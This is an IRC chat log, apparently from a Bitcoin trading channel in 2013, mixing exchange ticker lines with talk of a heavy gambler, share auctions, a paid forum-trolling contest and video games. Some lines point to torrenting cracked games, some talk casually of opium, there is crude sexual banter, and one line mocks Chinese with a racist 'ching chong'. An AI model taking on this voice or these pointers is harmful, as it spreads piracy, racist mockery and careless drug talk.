5975 @ 0.000669 = 3.9973 BTC [-] Feb 09 13:47:21 Bowjob this is since hwne ? Feb 09 13:47:59 ;;ticker --last Feb 09 13:48:00 23.19437 Feb 09 13:48:05 Umm, hes been playing for at least 12 hours now Feb 09 13:48:09 !ticker Feb 09 13:48:10 These beans is shit. Feb 09 13:48:16 I woke up, he was there Feb 09 13:48:25 whoa Feb 09 13:48:43 He bets 2-3 btc each Feb 09 13:48:47 Maybe he took a break Feb 09 13:48:52 but hes still playing right now Feb 09 13:50:50 When I first saw him he was at 29, then 20 Feb 09 13:50:52 now 13 Feb 09 13:51:13 I wonder what's going through his mind right now. Feb 09 13:51:24 _must bet all on red_ Feb 09 13:51:42 I was a bet for 1.234567 BTC Feb 09 13:51:46 He's like angry-happy-angry-happy-angry-happy Feb 09 13:51:51 dat transaction fee Feb 09 13:51:54 depending on win/loss Feb 09 13:52:03 More like.. angry angry angry x 20 Feb 09 13:52:07 then happy-angry Feb 09 13:52:13 then angy x20 Feb 09 13:52:20 when he runs out he'll be: pff... that was fun Feb 09 13:52:43 hahahaha now i remember Feb 09 13:52:47 i bet 10 btc on something Feb 09 13:52:50 at bitbet Feb 09 13:52:52 well, I read that gamblers get a kick Feb 09 13:52:56 similar to drugs Feb 09 13:53:01 [MPEX] [S.MPOE] 2300 @ 0.00067811 = 1.5597 BTC [+] Feb 09 13:53:02 i think it was that bfl will not deliver what they said in time Feb 09 13:53:04 heart racing, cant think Feb 09 13:53:41 Ah, same as when I spend a BTC or two on SealsWithClubs Feb 09 13:53:41 I'm surprised he's not martingaleing Feb 09 13:53:46 just for the thrill Feb 09 13:54:03 I'm a bad player, I always lose it =P Feb 09 13:54:18 I still come back every few week for an evening of poker Feb 09 13:54:27 I actually managed to win a bit Feb 09 13:54:39 despite not knowing what fold, check or whatever buttons meant Feb 09 13:54:43 >_> Feb 09 13:54:46 I just did all in Feb 09 13:54:47 and I won Feb 09 13:54:49 then cashed out Feb 09 13:54:59 It was a free chip code.. lol Feb 09 13:55:19 xD Feb 09 13:55:51 lol Feb 09 13:57:13 I wanted to bet btc in a game.. where I actually play the game Feb 09 13:57:24 but bitcoiners dont play videogames :/ Feb 09 13:57:49 I wanted to make bets on matches of strategy game Feb 09 13:57:51 well, theres this dude who sells steam games for bitcoin but Feb 09 13:58:22 I feel like I'd rake a lot of BTC if the game is street fighter iv.. lol Feb 09 13:58:33 But I'm a good and well ranked players and no bitcoiner seems to have heard of it so no one wants to have a match against me xD Feb 09 13:58:48 which game Feb 09 13:59:05 I even offered a winning prize to anyone who could defeat me, no entry fee. No one to play me Feb 09 13:59:50 http://weewar.com/ Feb 09 14:00:09 turn based strategy game Feb 09 14:00:26 ah.. Feb 09 14:00:40 I used to play this game.. Tactics Arena Feb 09 14:00:41 heard of it? Feb 09 14:00:50 It's a tbs game, flash based. Feb 09 14:01:08 I think so Feb 09 14:01:13 Haven't really played Feb 09 14:01:17 namnam, do u live near a microcenter?? Feb 09 14:01:22 would earn u some bucks if u did Feb 09 14:02:55 Okay, our baby whale stopped for now. Maybe it's bed time for him Feb 09 14:03:06 or her Feb 09 14:03:31 13k left.. I hope he calls his whale parents Feb 09 14:03:35 What's a microcenter? Feb 09 14:04:52 http://en.wikipedia.org/wiki/File:Mongolian_woman_condemned_to_die_of_starvation_%28retouched%29.jpg Feb 09 14:05:00 This pic is mesmerizing Feb 09 14:06:01 I'd be gnawing at the wood if I were her Feb 09 14:06:22 damn Feb 09 14:06:47 I saw it on an evil site Feb 09 14:07:26 There's two bowls, I assume for water? Feb 09 14:07:43 Here's a bit of bitsy music for all the bitcoiners out there: http://www.youtube.com/watch?v=rf_p3-8fTo0 Feb 09 14:08:27 Namworld: it shall be sad if no one outbids me Feb 09 14:08:43 Aye? Feb 09 14:09:05 At this price, I'd be sad if it would go any higher, for whoever is buying. Feb 09 14:09:42 I was expecting .25, not attaining near .45 like in Usagi's thread Feb 09 14:10:22 I should have put all BTC-MINING funds in ASICMINER when it came around instead Feb 09 14:10:29 yeah Feb 09 14:10:32 over 20 000 ASICMINER shares that would have been Feb 09 14:10:36 yeah Feb 09 14:11:06 Although at the time it wasn't around yet Feb 09 14:11:14 Plus there was still doubts Feb 09 14:11:29 Was the only ASIC manufacturer shares instead of bonds/mining op Feb 09 14:11:36 Namworld: microcenter is a electronics store Feb 09 14:11:51 The mining hardware seller is usually the winning side in bitcoin mining it seems Feb 09 14:12:00 Although .42 is a bit steep... Feb 09 14:12:14 Namworld: well, if they outbid me I can quit bidding on it and chase after those 5k Feb 09 14:12:34 Diablo-D3: i got 100 shares for sale, how much ya would pay for them? Feb 09 14:12:41 i dont atm know how much u are bidding Feb 09 14:13:06 Anduck: put a thread up in auctions and I'll bid on it Feb 09 14:13:15 hmm Feb 09 14:13:51 look at Namworld's thread as a template Feb 09 14:13:53 [MPEX] [S.MPOE] 10000 @ 0.00067812 = 6.7812 BTC [+] Feb 09 14:13:54 [MPEX] [S.MPOE] 17050 @ 0.00067811 = 11.5618 BTC [-] Feb 09 14:13:57 [MPEX] [S.MPOE] 10000 @ 0.00067811 = 6.7811 BTC [-] Feb 09 14:13:59 [MPEX] [S.MPOE] 5050 @ 0.00067781 = 3.4229 BTC [-] Feb 09 14:14:02 [MPEX] [S.MPOE] 11450 @ 0.00067236 = 7.6985 BTC [-] Feb 09 14:14:09 [MPEX] [S.MPOE] 10000 @ 0.00066314 = 6.6314 BTC [-] Feb 09 14:15:02 [MPEX] [S.MPOE] 20000 @ 0.00066314 = 13.2628 BTC [-] Feb 09 14:41:15 [MPEX] [S.MPOE] 8293 @ 0.00066036 = 5.4764 BTC [-] Feb 09 14:41:58 ;;eauth DeadWeasel Feb 09 14:42:04 Request successful for user DeadWeasel, hostmask DeadWeasel!~DeadWease@cpe-74-75-235-219.maine.res.rr.com. Get your encrypted OTP from http://bitcoin-otc.com/otps/6D206C24463BEC07 Feb 09 14:44:59 ;;everify freenode:#bitcoin-otc:496d252b310bac3783e06abad7e9965ed6dc6d1bab9d6f1bb321569a Feb 09 14:45:02 Error: In order to authenticate, you must be present in one of the following channels: #bitcoin-otc;#bitcoin-otc-foyer;#bitcoin-otc-ru;#bitcoin-otc-eu;#bitcoin-otc-uk;#bitcoin-otc-bans Feb 09 14:45:18 ;;eauth DeadWeasel Feb 09 14:45:19 Request successful for user DeadWeasel, hostmask DeadWeasel!~DeadWease@cpe-74-75-235-219.maine.res.rr.com. Get your encrypted OTP from http://bitcoin-otc.com/otps/6D206C24463BEC07 Feb 09 14:47:14 our whale is now 11k Feb 09 14:47:19 Please.. stop now little whale Feb 09 14:47:42 ;;everify freenode:#bitcoin-otc:496d252b310bac3783e06abad7e9965ed6dc6d1bab9d6f1bb321569a Feb 09 14:47:43 Error: In order to authenticate, you must be present in one of the following channels: #bitcoin-otc;#bitcoin-otc-foyer;#bitcoin-otc-ru;#bitcoin-otc-eu;#bitcoin-otc-uk;#bitcoin-otc-bans Feb 09 14:48:22 oh its nothing. its just a baby whale Feb 09 14:48:23 http://blockchain.info/address/1EAwKCEhyBcsZrZUPKYw8M4Lb8VM7Y1ep6 Feb 09 14:48:24 see Feb 09 14:49:05 hes down to 1/3rd of his meat left.. from what I saw earlier Feb 09 14:52:41 bowjob: the 1M block is sold ?? or evoorees remove him ? Feb 09 14:52:52 error4733 it tickered earlier. Feb 09 14:54:07 yep but i just open the # now, i saw the order in live.coinbr but just want to confirm Feb 09 14:54:49 ;;rate 1 mircea_popescu Feb 09 14:54:49 Error: 'mircea_popescu' is not a valid integer. Feb 09 14:55:06 100btc easy for you mp, n1 Feb 09 14:55:06 ;;rate mircea_popescu 2 Feb 09 14:55:09 Rating entry successful. Your rating for user mircea_popescu has changed from 1 to 2. Feb 09 14:55:50 ;;rate mircea_popescu 1 Feb 09 14:55:52 Rating entry successful. Your rating for user mircea_popescu has changed from 2 to 1. Feb 09 14:57:00 100 btc ? why ? Feb 09 14:58:08 [MPEX] [S.MPOE] 13100 @ 0.00065925 = 8.6362 BTC [-] Feb 09 14:59:06 for the last 1M block you said that Feb 09 15:00:17 huh ? Feb 09 15:00:18 huh Feb 09 15:00:41 they arent retards, they are whales Feb 09 15:01:08 we need them to keep the dice lucrative Feb 09 15:02:56 sigh Feb 09 15:03:09 mirc so hard Feb 09 15:03:32 never underestimate the power of MPEX users to surprise Feb 09 15:03:58 when can 2 BTC = 10,000 pizzas? Feb 09 15:04:42 when 1 BTC= $50k Feb 09 15:04:55 more like 100k Feb 09 15:05:06 oh, you want fancy pizza Feb 09 15:05:19 fancy? 10 dollars is pretty barebones Feb 09 15:05:34 at least here Feb 09 15:05:43 Bowjob: once it was 10,000 btc = 1 pizza Feb 09 15:05:52 waiting for 1 btc = 10,000 pizza XD Feb 09 15:05:56 it was 2 pizza Feb 09 15:05:59 was it??? Feb 09 15:06:01 the S.DICE tranche sold Feb 09 15:06:02 tyeah Feb 09 15:06:03 cool Feb 09 15:06:04 yeah Feb 09 15:06:34 so lets do a reverse laszlo Feb 09 15:07:09 yeah Feb 09 15:07:11 but it sold Feb 09 15:07:13 first Feb 09 15:07:25 a reverse laszlo? Feb 09 15:07:33 I guess the threat sparked some interest Feb 09 15:07:34 2 btc = 10000 pizzas Feb 09 15:07:47 ;;ticker Feb 09 15:07:48 BTCUSD ticker | Best bid: 23.30900, Best ask: 23.39898, Bid-ask spread: 0.08998, Last trade: 23.39898, 24 hour volume: 38884.81536642, 24 hour low: 22.25000, 24 hour high: 23.50000, 24 hour vwap: 22.73345 Feb 09 15:07:51 a while ago someone here asked wether havelock had an API. Seems they now have:https://bitcointalk.org/index.php?topic=135035.msg1512968#msg1512968 Feb 09 15:07:52 what threat ? Feb 09 15:08:01 molec ya they announced it like yest. Feb 09 15:08:02 the threat of removing the tranche Feb 09 15:08:33 Wait I fucked up the math Feb 09 15:08:53 dead weasel, yeah 1 btc = 50k Feb 09 15:09:02 Anyone remember FeedZeBirds? Anyone know what happened to it? Feb 09 15:09:27 thats 10 bucks a pizza.. I said 2 btc not 1 btc Feb 09 15:09:38 that would be a reverse lazlo Feb 09 15:10:04 i want to know this too ^ Feb 09 15:10:25 how do you pm someone Feb 09 15:10:26 In structured finance, a tranche (often misspelled as traunch or traunche) is one of a number of related securities offered as part of the same transaction. Feb 09 15:10:29 thank you google Feb 09 15:10:43 The word tranche is French for slice, section, series, or portion, and is cognate to English trench ('ditch'). In the financial sense of the word, each bond is a different slice of the deal's risk. Transaction documentation (see indenture) usually defines the tranches as different "classes" of notes, each identified by letter (e.g. the Class A, Class B, Class C securities) with different bond credit ratings (ratings). Feb 09 15:10:57 yea Feb 09 15:11:07 maybe tranche is imprecise Feb 09 15:11:35 CDOs have tranches Feb 09 15:11:52 [MPEX] [S.MPOE] 4450 @ 0.00066036 = 2.9386 BTC [+] Feb 09 15:11:59 these are more like different pricepoints Feb 09 15:12:01 whatevs Feb 09 15:12:14 I just wish my google doc would updat Feb 09 15:12:25 want to see if I broke a milestone with this pricemove Feb 09 15:14:56 [MPEX] [S.MPOE] 15552 @ 0.00066036 = 10.2699 BTC [+] Feb 09 15:14:57 [MPEX] [S.MPOE] 7498 @ 0.0006619 = 4.9629 BTC [+] Feb 09 15:16:38 damn bug. rolling on btc Feb 09 15:16:56 We started with the same capital, yet you seem to have the midas touch! Feb 09 15:21:06 ahaha this sa stuff is goinggreat Feb 09 15:21:09 i wonder how it ends. Feb 09 15:21:26 which? Feb 09 15:22:03 in the end, we will all get to swim in a tub full of cassicus coins Feb 09 15:23:07 http://trilema.com/2013/the-trolling-something-awful-competition/ Feb 09 15:24:44 Only 445 signatures left until Obama has to fire a murderer https://petitions.whitehouse.gov/petition/fire-assistant-us-attorney-steve-heymann/RJKSY2nb Feb 09 15:24:55 why is not called recruitment instead of competition Feb 09 15:24:58 You got an auto-updating spreadsheet, bugpowder? Feb 09 15:25:02 thanks for keeping the torch burning Diablo-D3 Feb 09 15:25:23 I'll go upvote the Steve Heyman threads on reddit, but I'm sure the petition will make it. Feb 09 15:25:39 [MPEX] [S.MPOE] 4907 @ 0.0006619 = 3.2479 BTC [+] Feb 09 15:25:41 [MPEX] [S.MPOE] 4041 @ 0.00066314 = 2.6797 BTC [+] Feb 09 15:25:42 [MPEX] [S.MPOE] 1252 @ 0.00067173 = 0.841 BTC [+] Feb 09 15:25:44 mp, same offer as MPOE-PR? :3 Feb 09 15:25:54 Bowjob hm ? Feb 09 15:26:04 on your link Feb 09 15:26:14 you offered $200 to that guy to stick a sharpie up his ass Feb 09 15:26:16 bowjob makes me think of blowjob... Feb 09 15:26:57 its like i see the invisible l there Feb 09 15:27:27 Bowjob heh, no, ty. i think i have enough of those by now Feb 09 15:28:30 the thing about forums gotta suckup to the moderators Feb 09 15:28:41 small penis syndrome Feb 09 15:29:15 sharpies are small. Shoulda said a sharpie MAGNUM. Feb 09 15:29:34 damn. that guy should take the offer Feb 09 15:29:37 i've got four regular sharpies store in my rectum for emergency porpises Feb 09 15:29:44 yes, dolhpins have emergencies too Feb 09 15:30:01 permanent market emergencies Feb 09 15:30:18 stopped soppa? Feb 09 15:30:19 yes, they have. some are only responses that say NO. Feb 09 15:30:26 some are action. Feb 09 15:30:33 EskimoBob: obama has taken a few seriously, yes Feb 09 15:30:44 now that the threshold is 100K sigs instead of 25K they should listen moar Feb 09 15:31:16 hehe Feb 09 15:31:25 You need something new to rant about, Bob? How do you feel about ASICMINER? Feb 09 15:31:26 eskimobob: have sopa provisions been passed in other bills? Feb 09 15:31:45 oh ASIC, the circlejerk of bitcoin. Feb 09 15:31:59 tis Feb 09 15:32:35 ' Feb 09 15:35:50 BFL : Chips have shipped from the fab and are on their way to the US.I will update more. But the chips are confirmed to have been sent. Feb 09 15:36:23 someone in the line ? Feb 09 15:37:29 wtf is something awful Feb 09 15:39:02 [MPEX] [S.MPOE] 2732 @ 0.00066336 = 1.8123 BTC [-] Feb 09 15:46:23 EskimoBob: lovely. i got wind of a couple, but I don't recall details. hopefull the blowback from Aaron will be enough to motivate more people to demand free information and the beginning of the end for prosecutorial abuse. but then again, i'm an idealist Feb 09 15:46:23 [MPEX] [S.MPOE] 15310 @ 0.00067173 = 10.2842 BTC [+] Feb 09 15:46:24 [MPEX] [S.MPOE] 16550 @ 0.00067465 = 11.1655 BTC [+] Feb 09 15:46:27 [MPEX] [S.MPOE] 4040 @ 0.00067555 = 2.7292 BTC [+] Feb 09 15:51:11 Well I'm out, goodnight Feb 09 15:51:15 9 am... Feb 09 15:51:18 night Feb 09 15:51:21 lol it is 9am Feb 09 15:51:36 yeah... I stayed up too long it seems Feb 09 15:55:10 [MPEX] [S.MPOE] 4542 @ 0.00067555 = 3.0683 BTC [+] Feb 09 15:56:34 its like 4pm i call shenanigans Feb 09 15:56:36 this is timescam Feb 09 16:00:26 didnt they try to get skyrim banned thru whitehouse petition? Feb 09 16:01:29 [MPEX] [S.MPOE] 4892 @ 0.00065926 = 3.2251 BTC [-] Feb 09 16:01:31 [MPEX] [S.MPOE] 8300 @ 0.00065925 = 5.4718 BTC [-] Feb 09 16:01:46 [MPEX] [S.MPOE] 35500 @ 0.00065814 = 23.364 BTC [-] Feb 09 16:01:48 [MPEX] [S.MPOE] 899 @ 0.00065685 = 0.5905 BTC [-] Feb 09 16:02:00 what would be their reasoning for banning skyrim? Feb 09 16:03:03 http://www.pcmag.com/article2/0,2817,2396888,00.asp Feb 09 16:03:26 what's skyrim evne ? Feb 09 16:04:31 it's a videogame Feb 09 16:04:36 a the game. wtf lol Feb 09 16:05:05 it was a troll attempt, however it made its way to the us government petition Feb 09 16:05:05 RPG, graphics heavy, pretty addictive game until it's not (around 2 months) Feb 09 16:05:18 i saw the petition myself Feb 09 16:06:03 wow, from 2011.. its been over a year Feb 09 16:06:15 sounds like my kinda game Feb 09 16:06:34 you can get cracked versions torrented. Feb 09 16:06:54 already looking into it Feb 09 16:07:49 you can mod the shit out of it: http://skyrim.nexusmods.com/ Feb 09 16:08:00 i made all the characters naked and allthe crops marijuana plants. Feb 09 16:08:19 lol screencap ? Feb 09 16:09:43 trolling eh Feb 09 16:09:56 http://static.skyrim.nexusmods.com/mods/images/27415-3-1353902711.jpg Feb 09 16:10:01 don't have my own Feb 09 16:10:17 dude that looks just like a scene from gothic Feb 09 16:10:40 whats that random eye in the center, invisible orc? Feb 09 16:11:05 http://trilema.com/2009/eu-ma-joc/ in the painting up there. Feb 09 16:11:07 used to view or activate or steal or something Feb 09 16:11:37 i dunno how im gonna manage my time now Feb 09 16:11:53 you're pretty well fucked for while Feb 09 16:11:57 good luck Feb 09 16:12:05 lol Feb 09 16:12:07 i had to delete it after 2 months Feb 09 16:12:27 well i usually stick to the one game i like, (call of duty) Feb 09 16:13:06 have you tried far cry 3 Feb 09 16:13:14 its like skyrim with guns Feb 09 16:13:21 nah, i was busy on cod1 Feb 09 16:13:54 cod2 came out in dec.. Feb 09 16:14:12 you mean blops 2 Feb 09 16:14:26 yea Feb 09 16:14:32 black co.... ops Feb 09 16:15:21 https://www.youtube.com/watch?v=jL331aZ8yjE Feb 09 16:16:26 im gonna wait til next month .. Feb 09 16:16:33 i miss rainbow six rogue spear Feb 09 16:16:34 try out oblivion 1st Feb 09 16:16:43 smart Feb 09 16:17:10 i dont wanna get sucked in too soon b4 sorting some stuff out u know Feb 09 16:17:34 i might get into this sdice thing Feb 09 16:17:38 try morrowind first! Feb 09 16:17:42 i hear ya, i don't play anything but urban terror when I find a server that's not all bots Feb 09 16:17:43 lots can happen in 1 month Feb 09 16:17:47 and then fail miserably Feb 09 16:17:52 lol Feb 09 16:19:05 thats exactly what would happen too Feb 09 16:19:34 yuyp Feb 09 16:19:35 yup Feb 09 16:19:39 you could always mod it though i guess Feb 09 16:19:46 but aint nobody got time for that Feb 09 16:20:42 oh u were talking about morrowind.. Feb 09 16:21:05 Mhm, mpex.co is updated with moonspeak! Feb 09 16:21:22 yes Feb 09 16:21:30 I can read it. Ching chong chang, chang ching chong. Feb 09 16:22:36 [MPEX] [S.DICE] 500 @ 0.006399 = 3.1995 BTC [-] Feb 09 16:23:06 morrowind too low tech for me phew Feb 09 16:23:46 [MPEX] [S.DICE] 6343 @ 0.0064 = 40.5952 BTC [+] Feb 09 16:25:03 亲爱的大王,这是什么? Feb 09 16:28:39 [HAVELOCK] [SDICE] 50 @ 0.63999999 = 32 BTC [+] Feb 09 16:28:41 [HAVELOCK] [SDICE] 160 @ 0.64 = 102.4 BTC [+] Feb 09 16:28:42 [MPEX] [S.MPOE] 4618 @ 0.00067555 = 3.1197 BTC [+] Feb 09 16:28:44 [MPEX] [S.MPOE] 5400 @ 0.0006772 = 3.6569 BTC [+] Feb 09 16:28:55 [MPEX] [S.MPOE] 4933 @ 0.00067795 = 3.3443 BTC [+] Feb 09 16:28:58 [MPEX] [S.MPOE] 7349 @ 0.00068254 = 5.016 BTC [+] Feb 09 16:30:56 Bowjob cool huh Feb 09 16:37:39 [HAVELOCK] [SDICE] 3 @ 0.668 = 2.004 BTC [+] Feb 09 16:39:18 4 s.mpoe hit .0007 aging? Feb 09 16:39:49 earlier yeah Feb 09 16:40:14 [MPEX] [S.MPOE] 7256 @ 0.00067202 = 4.8762 BTC [-] Feb 09 16:44:09 [MPEX] [S.DICE] 623 @ 0.0064 = 3.9872 BTC [+] Feb 09 16:46:11 [MPEX] [S.MPOE] 8275 @ 0.00067612 = 5.5949 BTC [+] Feb 09 16:51:08 [MPEX] [S.MPOE] 3344 @ 0.00067202 = 2.2472 BTC [-] Feb 09 16:51:10 [MPEX] [S.MPOE] 4019 @ 0.00065685 = 2.6399 BTC [-] Feb 09 16:51:24 [MPEX] [S.MPOE] 4737 @ 0.00065606 = 3.1078 BTC [-] Feb 09 16:57:09 how come there are no mpoe passthrus? Feb 09 17:00:05 there are Feb 09 17:00:17 [MPEX] [S.MPOE] 5263 @ 0.00065606 = 3.4528 BTC [-] Feb 09 17:00:19 [MPEX] [S.MPOE] 11437 @ 0.00065605 = 7.5032 BTC [-] Feb 09 17:00:23 https://btct.co/security/S.MPOE-PT Feb 09 17:00:52 https://bitfunder.com/asset/CoinBr.MPBPT-E Feb 09 17:01:07 https://bitfunder.com/asset/CoinBr.MPBPT-O Feb 09 17:01:28 The bitfunder ones are for even and odd months separately Feb 09 17:03:30 [MPEX] [S.MPOE] 7608 @ 0.00065798 = 5.0059 BTC [+] Feb 09 17:04:05 ThickAsThieves: CoinBr.MPBPT is not a passthrough for s.mpoe Feb 09 17:04:16 it's for mpoe bond Feb 09 17:04:27 zup Feb 09 17:05:10 mornin Feb 09 17:05:32 Ah, thanks Fab, I haven't read that one Feb 09 17:06:14 [MPEX] [S.MPOE] 14792 @ 0.00065798 = 9.7328 BTC [+] Feb 09 17:06:16 [MPEX] [S.MPOE] 658 @ 0.00067612 = 0.4449 BTC [+] Feb 09 17:09:56 actually the mpoe pt on glbse was like... the only thing there that made investors rich. Feb 09 17:10:05 kinda odd there's not more of them Feb 09 17:10:38 [MPEX] [S.MPOE] 2363 @ 0.00065605 = 1.5502 BTC [-] Feb 09 17:10:39 [MPEX] [S.MPOE] 3537 @ 0.00065586 = 2.3198 BTC [-] Feb 09 17:11:16 lol mp Feb 09 17:11:44 mp, are you okay? Feb 09 17:11:53 me ? sure. Feb 09 17:11:53 did the S.DICE sell order at .0062 get removed or was it eaten through? Haven't been paying attention Feb 09 17:12:01 pizzaman1337 it tickered away earlier. Feb 09 17:12:15 about 9k went in sdice/smpoe Feb 09 17:12:17 ok Feb 09 17:12:21 well mp, you seem to be pretty grumpy here Feb 09 17:12:37 i do ? Feb 09 17:12:39 [MPEX] [S.MPOE] 6463 @ 0.00065586 = 4.2388 BTC [-] Feb 09 17:12:41 [MPEX] [S.MPOE] 3537 @ 0.00065585 = 2.3197 BTC [-] Feb 09 17:12:55 well, you are known for being grumpy but even i am shocked Feb 09 17:13:01 even you ? Feb 09 17:13:03 lol ok. Feb 09 17:13:24 i thought you might be conntent by now Feb 09 17:13:47 personal life is fail i guess? Feb 09 17:14:00 im quite content. what are you on about dood ? Feb 09 17:14:20 im just a bit shocked, i have no issue. Feb 09 17:14:47 you really are a hard person to like. Feb 09 17:14:56 why'd you want to like me ? Feb 09 17:15:17 because of what you have done. Feb 09 17:15:43 speaking of which, need more ppl for Feb 09 17:15:45 ;;view 13393 Feb 09 17:15:47 #13393 Sat Feb 9 02:16:26 2013 mircea_popescu BUY 1.0 SA gift cert @ 0.5 BTC ((You will have to make a 9.95 credit card payment on https://secure.somethingawful.com/products/gift-certificate.php?product_type=register )) Feb 09 17:16:03 i am totally unsurprised at how many people actually wnat to do this. Feb 09 17:16:21 you are tolling SA? Feb 09 17:16:30 well, not personally. Feb 09 17:16:34 ? Feb 09 17:16:43 http://trilema.com/2013/the-trolling-something-awful-competition/ Feb 09 17:16:46 it's like a contest. Feb 09 17:17:13 [MPEX] [S.MPOE] 2263 @ 0.00065585 = 1.4842 BTC [-] Feb 09 17:17:16 [MPEX] [S.MPOE] 4321 @ 0.00065462 = 2.8286 BTC [-] Feb 09 17:17:17 [MPEX] [S.MPOE] 5650 @ 0.00065461 = 3.6985 BTC [-] Feb 09 17:17:19 [MPEX] [S.MPOE] 19166 @ 0.00065283 = 12.5121 BTC [-] Feb 09 17:17:20 no takers yet mp? Feb 09 17:17:25 like half a dozen Feb 09 17:17:31 im running out of the damned codes. Feb 09 17:17:38 lol Feb 09 17:17:49 but it's cool, gives noobs a chance to get a little btc with their cc Feb 09 17:17:51 i think i could win that contest Feb 09 17:18:00 (would prob have done so for free) Feb 09 17:18:07 so go ahead. Feb 09 17:18:19 im just a goat Feb 09 17:19:00 actually now that i think about it, last i heard of you you were chasing the dragon Feb 09 17:19:06 how's that worked out ? caught it ? Feb 09 17:19:42 opium? Feb 09 17:20:37 sadly no, but i wish.... Feb 09 17:21:08 Oct 02 17:45:09 Chaang-Noi are you like this when you're drunk or when you're sober ? Feb 09 17:21:08 Oct 02 17:45:51 high... Feb 09 17:21:08 Oct 02 17:46:05 stick with it. Feb 09 17:21:08 Oct 02 17:46:10 on opium Feb 09 17:21:08 Oct 02 17:46:18 i just dont cae any more Feb 09 17:21:35 yeah that was like months ago Feb 09 17:21:46 oh wait, you dated it so you know already Feb 09 17:21:58 so why to stupid question? Feb 09 17:22:07 was curious how it worked out. Feb 09 17:22:15 its called the dragon now? Feb 09 17:22:15 opium is pretty nice Feb 09 17:22:21 now? Feb 09 17:22:23 truffles it always was called chasing teh dragon Feb 09 17:22:31 truffles you must be new to life Feb 09 17:22:51 drugs r bad mmk Feb 09 17:22:56 lol Feb 09 17:23:03 alcohol is good though Feb 09 17:23:08 lol Feb 09 17:23:21 it's certainly an older idiomatic than welfarism. Feb 09 17:23:29 opium is like codean Feb 09 17:23:40 mp is right Feb 09 17:23:50 chrildren will not understand... Feb 09 17:24:08 opium looks like a nasty thing to get hooked on Feb 09 17:24:10 but mp is silly for thinking i was on opium for 5 months, lulz Feb 09 17:24:22 Chaang-Noi well it's why i asked Feb 09 17:24:29 i get the joy of using opium like 2 times a year Feb 09 17:25:09 gonna try weed something, on the to do list Feb 09 17:25:26 well mp, i dont know how it is where you live, but opium is not just floated around here Feb 09 17:25:30 23.56 Feb 09 17:25:39 nic bug :) Feb 09 17:25:43 ;;ticker Feb 09 17:25:44 BTCUSD ticker | Best bid: 23.50001, Best ask: 23.56176, Bid-ask spread: 0.06175, Last trade: 23.50001, 24 hour volume: 40016.41463094, 24 hour low: 22.25000, 24 hour high: 23.56277, 24 hour vwap: 22.82996 Feb 09 17:25:45 nice+ Feb 09 17:25:47 pretty cool. Feb 09 17:25:55 yup Feb 09 17:26:07 hope it reaches 100 Feb 09 17:26:10 mp how mant btc you hold? Feb 09 17:26:19 a lot. Feb 09 17:26:23 many+ Feb 09 17:26:33 I think 50k+ Feb 09 17:26:33 i assumed thwt Feb 09 17:26:36 that Feb 09 17:26:43 just do quick calc on how many s.mpoe he sold Feb 09 17:26:56 i just do not understand my mp is so grumppy Feb 09 17:27:01 (i decided not to do it myself) Feb 09 17:27:08 lol jurov Feb 09 17:27:13 sad thing is, btc i hold > btc i own Feb 09 17:27:15 so go figure Feb 09 17:27:27 i have been there Feb 09 17:27:33 mp so ure rich Feb 09 17:27:35 how did it end? Feb 09 17:27:42 Bugpowder pirate. Feb 09 17:27:42 mp is rich Feb 09 17:27:59 can you buy a nice car with the btc Feb 09 17:28:08 mp is rish, but frummpy:) Feb 09 17:28:18 im sure mp could buy a kick ass car Feb 09 17:28:37 ;;rated FabianB_ Feb 09 17:28:38 You have not yet rated user FabianB_ Feb 09 17:28:39 yeah i bought a car with btc Feb 09 17:28:43 wasnt the best call i made. Feb 09 17:28:47 ;;rate FabianB_ 1 bought me SA gift cert. Feb 09 17:28:48 Error: User doesn't exist in the Rating or GPG databases. User must be GPG-registered to receive ratings. Feb 09 17:28:56 ;;rated FabianB Feb 09 17:28:56 orly what kind Feb 09 17:28:58 You have not yet rated user FabianB Feb 09 17:29:01 ;;rate FabianB 1 bought me SA gift cert. Feb 09 17:29:03 Rating entry successful. Your rating of 1 for user FabianB has been recorded. Feb 09 17:29:14 mp, i grew up withthe founder of SA Feb 09 17:29:16 vw golf Feb 09 17:29:21 Chaang-Noi who's that ? Feb 09 17:29:42 i lived in lee's summit for years Feb 09 17:29:45 [MPEX] [S.MPOE] 16100 @ 0.00065902 = 10.6102 BTC [+] Feb 09 17:30:08 he was a bit older than me, and i hung out with moot but we still talked Feb 09 17:30:38 moot is the reddit guy ? Feb 09 17:30:41 teslaaa Feb 09 17:30:47 moot is 4chan Feb 09 17:30:50 or no, wait. the reddit guy was yeah. Feb 09 17:31:19 moot is 4chan Feb 09 17:31:21 i have never done reddit, but im tight with 4chan and SA founders Feb 09 17:31:23 moot IS 4chan Feb 09 17:31:32 yes d3 Feb 09 17:31:33 seriously, theres an ethernet jack in his head Feb 09 17:31:54 mp have u been hacked before? Feb 09 17:31:56 i talekd moot into taking btc Feb 09 17:32:00 well, i helped Feb 09 17:32:25 thats an argument against bitcoins, hackers be crazy Feb 09 17:32:37 [MPEX] [S.MPOE] 4321 @ 0.00065822 = 2.8442 BTC [-] Feb 09 17:32:37 no, I talked moot into taking btc Feb 09 17:32:38 [MPEX] [S.MPOE] 18729 @ 0.0006584 = 12.3312 BTC [+] Feb 09 17:32:51 ok, so you to go talk to the sa guy so he takes btc Feb 09 17:33:00 you two* Feb 09 17:33:02 okay d3 Feb 09 17:33:18 i dont care, i just told him it was cool Feb 09 17:33:21 mircea_popescu: meh, I never cared for sa, really Feb 09 17:33:24 and how to do it Feb 09 17:33:29 and he did it Feb 09 17:33:31 what is SA! Feb 09 17:33:31 and advertise sdice on sa,lol Feb 09 17:33:38 d3 might have been a leader, i dont know Feb 09 17:33:46 Diablo-D3 ok, so get vice.com forums to take btc Feb 09 17:33:54 truffles: somethingawful Feb 09 17:33:55 mircea_popescu: thats even worse dude Feb 09 17:33:56 jurov if they had any moneys... Feb 09 17:34:09 I dunno, Im burned out on community efforts lately Feb 09 17:34:09 vice.tv is free on utube Feb 09 17:34:19 Diablo-D3 seems to me about the same thing, obscure "funny" paper with internet presence. Feb 09 17:34:26 i feel old, was well over 10 years ago when SA started making people pay for accounts, im shocked they are still around Feb 09 17:34:35 mircea_popescu if not money, at least gossip ... but guest we get that for free Feb 09 17:34:39 paying for accounts is the way to go. Feb 09 17:34:41 *guess Feb 09 17:34:46 Chaang-Noi: dude, I remember when SA didnt exist Feb 09 17:34:50 Chaang-Noi: that was awesome Feb 09 17:34:54 jurov it's certainly cheaper at .5 btc a pop than w/e they'd want for advertising Feb 09 17:34:55 ;;rate mircea_popescu 2 very trusted based on otc trades and active mpex user (mircea owns mpex) Feb 09 17:34:57 more importantly, i wouldn Feb 09 